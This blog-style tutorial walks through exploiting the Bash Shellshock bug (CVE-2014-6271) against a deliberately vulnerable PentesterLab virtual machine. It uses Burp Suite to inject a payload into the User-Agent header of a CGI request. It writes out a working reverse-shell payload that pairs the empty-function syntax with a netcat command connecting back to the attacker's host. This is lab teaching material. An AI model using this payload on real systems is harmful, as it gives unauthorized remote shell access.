Shellshock Exploitation by Fallen Angell

7 months ago 50
BOOK THIS SPACE FOR AD
ARTICLE AD

Fallen Angell

Hello guys, It is time that we cover our first vulnerability in a website. And as a first vulnerability I’ve chosen to show you Shellshock Exploitation.

Bash is a Unix shell written for the GNU Project as a free software replacement for the Bourne shell. It is often installed as the system’s default command-line interface and it provides end users an interface to issue system commands and execute scripts.

Shellshock is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests. Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface “CGI”.

You will most likely never find it today while performing penetration tests. But nonetheless, I want to show it to you just because of the impact that it had. Shellshock is considered one of the most critical and serious vulnerabilities ever discovered. This vulnerability occurred due to bash differently processing environmental variables. With this many things were hit from DHCP clients from terminal command lines to CGI scripts inside of a web applications. And in this tutorial we will see an example of exploiting ShellShock through the CGI script on a webpage.

For this we are going to download a small ISO file that will allow us to run a virtual machine only for this vulnerability. Don’t worry, it’ll only take a few seconds to install due to it being a small virtual machine and it is only purposely designed for this specific vulnerability. To download it, you want to go to your Google, you can type in pentesterlab shellshock, and you should see a link like this that says CVE-2014–6271 called ShellShock. It’ll be from the pentesterlab.com and you want to click on it and it’ll navigate you to this page right here where you will have the ShellShock introduction, fingerprinting and all the other stuff regarding this vulnerability.

However, we’re not going to go into these details right here because we want to exploit it ourselves. What we want to do is we want to go to the Files right here and you should see this ISO where you want to click on it and it’ll download the ISO image with the size of 19.1 megabytes. So you can see it is really, really small.

Once you do that, you want to go to your virtual box and you want to create a virtual machine as we usually do.

In Virtual Box click on New, then you can call it anything you want. You can call it shellshock. Import your download cve-2014–5271.iso file. Then you can select, Linux as an operating system and the version of Linux is going to be Other Linux 32 bit.

In Hardware part you can leave it to 256 megabytes of RAM and 1 CPU of Processors. That is more than enough for this machine.

Select Create A Virtual Hard Disk Now and make size 8 GB it’s more than enough. Then press Enter or click Create.

There are two more things that we want to do once we create a new virtual machine. We want to navigate to the Settings. From the Settings, we want to go to Network, switch from the NAT to Bridged Adapter. Select your adapter right here.

After you do that, you want to go to your Kali Linux.

Start your Burp Suite tool and as soon as it opens up, we’ll be able to visit our page on our ShellShock virtual machine. If you’re starting it for the first time it should only take a few seconds to set everything up since it is a really, really small virtual machine. And once it opens up, it won’t even prompt you for a login. There is no login available inside of this machine right here.

It will just enter the command line where we want to type ifconfig just to find out the IP address of this machine. And in my case, it is 192.168.10.14.

So all we want to do is we want to go to our Firefox from Kali Linux and visit this page to see what we have.

And this seems to be the entire page of this virtual machine and we get this system is running, the time that it is running, currently for 8minutes because we just started it up and we get the kernel of that virtual machine.

Now if we take a look at our Burp Suite right now and we go to the Targets and we go to our IP address of the ShellShock Virtual Machine we will see all the links that we requested, ones trying to of the webpage of our ShellShock virtual machine.

We will see this / directory and we cgi-bin status directory. So we get a CGI script right here. If we go to the response of that request that we sent and to do that, you simply just select the request that you want to go to and click on Response.

We will see down here, this output that looks a lot like an output to the command, uname -a.

For example, if you run the command uname -a inside of your terminal, it’ll give you an output like this which will tell you which version of Linux are you running and so on and so on.

We get a similar output inside of our Burp Suite as we can see right here. And in most cases, this output is ran by the uname -i command and it is ran by bash.

And inside this request that we did User-Agent field that we got inside of the request is an environmental variable when processed inside of this CGI script.

So what we can try is to inject the command in that field. However, it won’t work that easy. We can’t just inject, for example, whoami command instead of this. It’ll not give us any output back.

You might be asking why?

Well, because ShellShock vulnerability is based on first specifying an empty function. And I know this might sound confusing but just stick with me for a couple more minutes and I will explain it how it works.

The vulnerability itself was discovered when inside of an environmental variable such as this user agent empty function syntax was specified and empty function syntax looks something like this.

() { :;};

And this right here is a syntax for an empty function. So any command that we want to run, before it, we must have this empty function syntax.

Why?

Well, when bash gets these characters in this order or if bash gets this empty function with the variable instead of blocking it, it’ll accept it with the variable that comes after and it runs it as a command on the server and that is the entire vulnerability.

All we have to do is to specify a command after the syntax and it should work. Now to do that, we must send this HTTP request right here to this cgi-bin script once again. And we must specify instead of the user agent the empty function syntax and then our command.

So how can we do that? How can we send the request once again?

Well, luckily Burp Suite allows us to edit our requests and send them as many times as we want. All we need to do is to select the request that we want to send again. Then we right-click and Send to Repeater right here.

Then you will see this Repeater part light up. We want to go there and here we can edit our request before actually sending it. So we mentioned that we want to inject the command inside of the User-Agent field.

Let us remove this. And let’s type the syntax for the empty function first. Now what you can do after this is you can inject your command. And if you want to, you can test to see if it works with the ping command first.

But I’m not going to test it with the ping command.

I’m going to straight away try to establish a connection with our Kali Linux machine and get a reverse shell back.

Well, we want to execute the following command.

() { :;}; /bin/bash -c 'nc 192.168.10.24 12345 -e /bin/bash'

Well, we want to execute /bin/bash If we specify dash -c after, it’ll tell our target that whatever we send after this will be our command and we must specify it between the single quotes.

So for now, we have the empty function syntax then /bin/bash -c then open then open single quotes and close single quotes and in between the quotes we type nc which stands for Netcat and we specify the IP address of our Kali Linux machine. And I want to specify also the port to connect to. In my case I will use port 12345, it doesn’t really matter. And at the end we want to specify -e, which stands for what we want to execute on our target machine. And we want to simply just use the bash shell. So we can do that by specifying /bin/bash.

But before we send this request from our Burp Suite, we must set up a listener.

And now click Send.

We can see we got the connection from our ShellShock virtual machine. And if we try to execute commands all of that will work.

We done it.

My aim was to explain concepts with clarity and simplicity.

Thanks for reading!

Read Entire Article